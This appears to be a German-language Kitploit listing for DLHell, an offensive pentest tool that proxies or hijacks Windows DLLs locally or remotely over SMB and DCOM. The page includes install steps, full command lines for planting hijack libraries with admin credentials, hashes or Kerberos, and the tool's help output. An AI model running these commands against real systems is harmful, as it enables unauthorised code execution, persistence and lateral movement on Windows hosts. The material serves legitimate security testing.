Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DLHell — Local & remote Windows DLL Proxying | Kitploit
Tools/GitHubGitHub/synacktiv/dlhell
Privilege EscalationPersistence MechanismsExploitationLateral MovementPost-ExploitationPayload Development
GitHubsynacktiv/dlhell

DLHell

Local & remote Windows DLL Proxying

Repository anzeigen
17222vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DLHell

DLHell führt lokales und entferntes Windows-DLL-Proxying über DCOM aus.

Install

Die folgenden Pakete werden benötigt (kann von deiner Distribution abhängen, das folgende Beispiel ist für Debian 12):

root@kitploit:~
sudo apt install -y g++-mingw-w64-x86-64-win32 binutils-mingw-w64-x86-64

Installiere die pip-Abhängigkeiten:

root@kitploit:~
pip3 install -r requirements.txt

Quick start

Der folgende Befehl übernimmt (hijackt) die netutils.dll-Bibliothek auf dem Host 10.137.0.48 aus der Vorlagendatei template.tpe (C++-Quellcode-Hijack-Bibliothek), die calc.exe startet. Sowohl die Original- als auch die Proxy-DLL werden im Ordner program files/windows nt/accessories/ der Freigabe C$ auf dem entfernten Zielsystem abgelegt.

Bitte verwende die Impacket-Syntax für die Option -remote-target.

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -remote-lib 'windows/system32/netutils.dll' -remote-target 'program files/windows nt/accessories/test.dll' -target 'domain/user:password@ip'

Kerberos-Authentifizierung kann ebenfalls verwendet werden:

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -k -target wks-02.vault-tech.com -progid WordPad.Document.1

Verfügbare CLSIDs und ProgIDs auflisten:

root@kitploit:~
DLHell.py -list

Usage

root@kitploit:~
 ____  _     _   _      _ _
|  _ \| |   | | | | ___| | |
| | | | |   | |_| |/ _ \ | |
| |_| | |___|  _  |  __/ | |
|____/|_____|_| |_|\___|_|_|

DLHell v1.0

usage: DLHell.py [-h] [-local-lib LOCAL_LIB] [-remote-lib REMOTE_LIB] [-local-target LOCAL_TARGET]
                 [-remote-target REMOTE_TARGET] [-target TARGET] [-clsid CLSID] [-progid PROGID] -t T -c C
                 [-u U] [-l] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
                 [-target-ip ip address] [-port [destination port]]

DLL Hell - DLL Proxifier/Hijacker

options:
  -h, --help            show this help message and exit
  -local-lib LOCAL_LIB  Path of the remote library on the local system, ex: version.dll
  -remote-lib REMOTE_LIB
                        Path of the library on the remote system, ex: windows/system32/version.dll. WARNING:
                        Will connect using SMB on C$ share. Admin rights needed. Requires -target
  -local-target LOCAL_TARGET
                        The new name of the local output proxyfied library
  -remote-target REMOTE_TARGET
                        The new name of the remote proxyfied library. WARNING: Will connect using SMB on C$
                        share. Admin rights needed. Requires -target
  -target TARGET        [[domain/]username[:password]@]<targetName or address>
  -clsid CLSID          CLSID of DCOM class to activate
  -progid PROGID        ProgID of DCOM class to activate
  -t T, -template T     Template file to use for lib generation
  -c C, -command C      Command to execute using hijacked lib
  -u U, -user U         Name of the user to hijack (used to put DLLs in localappdata folder)
  -l, -list             Lists vulnerable CLSID & ProgID for DCOM Hijacking

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on
                        target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN)
                        specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as
                        target. This is useful when target is the NetBIOS name and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

Local DLL Proxying

Für das lokale Erstellen von DLL-Proxys verwende die Optionen -local-lib (Name der Proxy-DLL) und -local-target (umbenannte Original-DLL):

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -local-lib 'lib/netutils.dll' -local-target 'test.dll'

Remote DLL Proxying (Administratorrechte erforderlich):

Für Remote-DLL-Hijacking gib die Optionen -target, -remote-lib (Name der Original-DLL auf dem Remote-Host) und -local-target (umbenannte Original-DLL) an:

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -remote-lib 'windows/system32/PROPSYS.dll' -remote-target 'windows/test.dll'

DCOM DLL Proxying (Administratorrechte erforderlich)

DCOM-DLL-Proxying kann mithilfe der Optionen -progid und -clsid ausgenutzt werden. Die Liste der verfügbaren CLSIDs und ProgIDs erhältst du mit dem folgenden Befehl:

root@kitploit:~
DLHell.py -list

Du kannst neue Hijacks in der Datei dcom.json hinzufügen, die Pfade für verwundbare Bibliotheken definiert:

Danach werden nur noch die ProgID oder CLSID benötigt, um:

  • Die Original-DLL abzurufen
  • Die Hijack-Bibliothek zu erstellen und zu kompilieren
  • Die Bibliotheken auf dem entfernten Host hochzuladen
  • Die entfernte DCOM-Klasse zu aktivieren

Beispiel für die ProgID WordPad.Document.1:

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -progid WordPad.Document.1

Beispiel für die CLSID 73FDDC80-AEA9-101A-98A7-00AA00374959:

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -clsid 73FDDC80-AEA9-101A-98A7-00AA00374959
Tool herunterladen